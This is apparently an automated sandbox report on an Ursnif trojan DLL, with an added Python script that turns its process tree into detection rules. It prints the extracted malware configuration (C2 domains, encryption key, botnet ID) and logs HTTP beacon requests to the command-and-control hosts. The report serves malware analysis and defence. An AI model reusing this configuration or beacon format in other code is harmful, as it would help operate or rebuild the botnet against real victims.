
Analysis Report 2ff0174.dll

Overview

General Information

Sample Name:2ff0174.dll
Analysis ID:431863
MD5:9f07670d0192eb4c2fa2dbafb6b3dddf
SHA1:0fac819049810a6707ce2269dd9cee6347b8ec7b
SHA256:a62876ad5b23476a42760a93bd502ce8d91d86a1fcbfa0f9edc673f4243a08f3
Tags:dll

Detection

Ursnif
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected Ursnif
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6012 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2ff0174.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5360 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2ff0174.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4092 cmdline: rundll32.exe 'C:\Users\user\Desktop\2ff0174.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5988 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2ff0174.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 5920 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 4084 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6136 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:82948 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6408 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17440 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17446 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 7156 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17452 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2392 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17456 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6224 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17464 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 7112 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17472 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5616 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17482 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5088 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17488 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5184 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:83026 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2156 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17500 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 3680 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:83040 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4852 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17514 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6928 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17520 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4644 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17524 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5584 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17530 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5132 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17534 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4880 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:83092 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 5972 cmdline: rundll32.exe C:\Users\user\Desktop\2ff0174.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
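The tree above is the sandbox exercising the DLL three ways (loaddll32.exe is Joe Sandbox's own loader harness, not part of the sample): rundll32.exe with ordinal export #1 launched through cmd.exe, regsvr32.exe /s, and rundll32.exe with DllRegisterServer. Internet Explorer then appears as a child of the harness process and, per the Networking section below, is the process that resolves the C2 domains, consistent with the "Creates a process in suspended mode (likely to inject code)" signature and with Ursnif running its network code from an injected browser. The Python below is an added example, not part of the report: it parses tree lines in the report's own format (a constructed, abridged copy of the tree above is embedded as sample input) and applies the host-side rules a defender could port to Sysmon or EDR process-creation events. The rule names, the user-writable-path list and the "normal browser parent" set are my own choices; on a real host the unexpected browser parent would be something like an Office process or a rundll32.exe rather than the sandbox harness.

```python
"""Host-side detection logic derived from the report's process tree.

Added example (not from the Joe Sandbox report). It parses tree lines in
the format the report prints and flags the execution patterns seen above.
"""
import re
from dataclasses import dataclass

# Constructed sample input: the report's Process Tree, abridged to a single
# iexplore.exe child. Indentation encodes the parent/child relationship.
SAMPLE_TREE = r"""
  • System is w10x64
  • loaddll32.exe (PID: 6012 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2ff0174.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5360 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2ff0174.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4092 cmdline: rundll32.exe 'C:\Users\user\Desktop\2ff0174.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5988 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2ff0174.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 5920 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 4084 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 5972 cmdline: rundll32.exe C:\Users\user\Desktop\2ff0174.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
"""

LINE_RE = re.compile(
    r"^(?P<indent> *)• (?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmdline>.*)"
    r" MD5: (?P<md5>[0-9A-Fa-f]{32})\)\s*$"
)
# Locations an unprivileged user can write to (assumption; tune per environment).
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(desktop|downloads|appdata)\\|\\temp\\|\\programdata\\", re.I
)
DLL_HOSTS = {"rundll32.exe", "regsvr32.exe"}
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
NORMAL_BROWSER_PARENTS = BROWSERS | {"explorer.exe"}


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    md5: str
    parent: "Proc | None" = None


def parse_tree(text):
    """Map PID -> Proc, linking each process to its parent via indentation depth."""
    procs, stack = {}, []          # stack holds (indent, Proc) of open ancestors
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:                  # 'System is w10x64' / 'cleanup' carry no PID
            continue
        indent = len(m["indent"])
        while stack and stack[-1][0] >= indent:
            stack.pop()
        proc = Proc(int(m["pid"]), m["image"].lower(), m["cmdline"], m["md5"],
                    stack[-1][1] if stack else None)
        procs[proc.pid] = proc
        stack.append((indent, proc))
    return procs


def find_findings(procs):
    """Return (pid, rule) pairs; each rule corresponds to one process-creation event."""
    findings = []
    for p in procs.values():
        if p.image in DLL_HOSTS and USER_WRITABLE.search(p.cmdline):
            findings.append((p.pid, "dll-host-loads-from-user-writable-path"))
        if p.image == "rundll32.exe" and re.search(r",#\d+\b", p.cmdline):
            findings.append((p.pid, "rundll32-ordinal-export"))
        if p.image == "regsvr32.exe" and re.search(r"(^|\s)/s(\s|$)", p.cmdline, re.I):
            findings.append((p.pid, "regsvr32-silent-register"))
        if (p.image in BROWSERS and p.parent is not None
                and p.parent.image not in NORMAL_BROWSER_PARENTS):
            findings.append((p.pid, "browser-spawned-by-unexpected-parent"))
    return findings


if __name__ == "__main__":
    for pid, rule in find_findings(parse_tree(SAMPLE_TREE)):
        print(f"PID {pid}: {rule}")
```

Run against the sample tree this yields hits for PIDs 4092 (ordinal export plus user-writable path), 5988 (silent regsvr32 plus user-writable path), 5972 (user-writable path) and 5920 (browser launched by a non-shell parent); the child IE tab process 4084 is not flagged because its parent is a browser.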

Malware Configuration

Threatname: Ursnif

{
  "RSA Public Key": "Hlj6FsCRmYLQM3DePAZKhqqkm2anmmatLYzzlHMToI9oQMsMAI9IbEz2bGdd+gr2u4VuQjeWYilfB/16/izG7wjz7L4W/Jko2VygJincvoQS9l5iG1bHubawsajm0EZr4kAGsqUOVptbNuiYmv9FF2NvtfBzvBKTABLE/vZO1hlYCpOb21WeAL0kkXf6wrbg",
  "c2_domain": ["mail.com", "vhfkffjddyjunekugjtr.xyz", "qtrweyuiopolkhgbjune.xyz"],
  "botnet": "5455",
  "server": "12",
  "serpent_key": "10291029JSRABBIT",
  "sleep_time": "10",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0",
  "DGA_count": "10"
}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.260584112.0000000002148000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | -
00000002.00000003.249635559.0000000005058000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | -
00000002.00000003.249696219.0000000005058000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | -
00000002.00000003.249777880.0000000005058000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | -
00000003.00000003.284826529.0000000004C98000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | -
(31 entries in total; the first 5 are shown)

            Sigma Overview

            No Sigma rule has matched

            Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 2ff0174.dll | Avira: detected
Found malware configuration
Source: 2.2.regsvr32.exe.10000000.3.unpack | Malware Configuration Extractor: Ursnif (the configuration listed under Malware Configuration above)
Machine Learning detection for sample
Source: 2ff0174.dll | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.regsvr32.exe.10000000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 6.2.rundll32.exe.10000000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.2.rundll32.exe.10000000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Uses 32bit PE files
Source: 2ff0174.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Tries to load missing DLLs
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49782 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49783 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49784 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49804 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49812 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49813 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49814 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49815 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49819 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49820 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49822 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49821 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49828 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49827 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49829 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49830 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49855 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49854 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49875 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49876 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49878 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49877 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49884 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49883 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49885 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49886 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49889 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49890 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49891 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49892 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49899 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49900 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49902 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49901 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49904 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49903 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49906 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49905 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49912 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49911 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49913 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49914 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49918 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49919 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49920 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49921 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49927 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49926 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49929 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49928 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01724C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_01724C3B
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_00AD4C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00AD4C3B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04254C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_04254C3B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_029B4C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,6_2_029B4C3B

            Networking:

Performs DNS queries to domains with low reputation
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | DNS query: vhfkffjddyjunekugjtr.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | DNS query: vhfkffjddyjunekugjtr.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | DNS query: vhfkffjddyjunekugjtr.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | DNS query: vhfkffjddyjunekugjtr.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | DNS query: qtrweyuiopolkhgbjune.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | DNS query: qtrweyuiopolkhgbjune.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | DNS query: qtrweyuiopolkhgbjune.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | DNS query: qtrweyuiopolkhgbjune.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | DNS query: vhfkffjddyjunekugjtr.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | DNS query: vhfkffjddyjunekugjtr.xyz
Source: DNS query: vhfkffjddyjunekugjtr.xyz
Source: DNS query: vhfkffjddyjunekugjtr.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 151.101.1.44
Source: Joe Sandbox View | IP Address: 104.20.185.68
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: global trafficHTTP traffic detected: GET /uripath/fcbslbaQpLGER/anAUxx7k/P6qNRF5XQyAjAahpDrcIJV_/2BFr8ewDzH/kQKcuAEadNq8bnSP3/wERFtfm7vyGn/vtnJWrjvx8a/3Jsty6cDbS_2BT/gpxDtVgwpd6fGwdYn6qs2/kmBHoYzJ0NzlB9tA/okgty4mo62PuQhI/vZTwR4IKuGhmX2McfB/4w9w6_2Bd/_2B3x_2Bn_2B/YKaqn.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mail.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uripath/WORqDY6_2BNfZ/KgWjiUUb/r87p6Orp_2Fmh0hHOaxhMMx/ttdOCXkBqo/vynRd5zf5hKBUtGNh/0ojVxeS0qGS0/kgLUoqcMUEo/HR5dFHbxXWkW5o/9wtG9IYf543FmlEl8G7Oe/tN_2FH_2FSXdL5Ee/kdKHsrNBEo9mT5n/OC3135hdYrpmFulc1o/ahW7bgseQVlR0vy/8zZARGC.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4; lang=en
            Source: global trafficHTTP traffic detected: GET /uripath/Dpso2yRgb0Dyb/KAn6cCpr/gAmXw5kfG_2Bc9ne1cJuUpm/vIdHSfsVJ8/z1jcayamlCKKrI29R/G_2B_2FccqD2/qf4e_2Fz6RI/K0AsHCwnacJmTs/dz3R8eKROUC_2FWQj5PLa/EqJtAUgFuyqujecx/FxvhHy9NhkNYETE/8xNMShuXbdh_2BRm2_/2BKALThQM/WfIVp4VFD/2fstwBtrQ/e.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4
            Source: global trafficHTTP traffic detected: GET /uripath/PbAYRrZYAKQJ_2FiZxLfQe/0W3TmhG_2FKNb/HT1zWvSh/WsU1_2F6i0huFYRA429S2ek/rkBd8Gm1wt/jPrgo3Qm1r_2FcnOo/wfKJYrVFbHaY/uPAV9mHMrKZ/jAk7myMZiDAmSQ/yOGTwTyxfld98bsDv53U4/FqusXxECzNJh4e3H/b3Q8IDIjGjZYWaI/QVKc4rs5AqW2/jMtBGa.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4
            Source: global trafficHTTP traffic detected: GET /uripath/E2bq2WZHjxXirUql/0j3wLqnWLhS_2FZ/sba7m_2B0uIP2xWYHL/1K7Ue7b7G/RDSt44BzYu1fE3VAPCUJ/9QPLsVrWwp160niu2b2/eq5dmXJov5C7F4b262v9FO/_2BKRjfeC1BxT/FFLUNvQ4/Tdu5jzZWgzD6sQniFWjnG4k/aiTESeJUr_/2BQ8CAw1bz7En6onW/NIK7zZLA/ci.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4
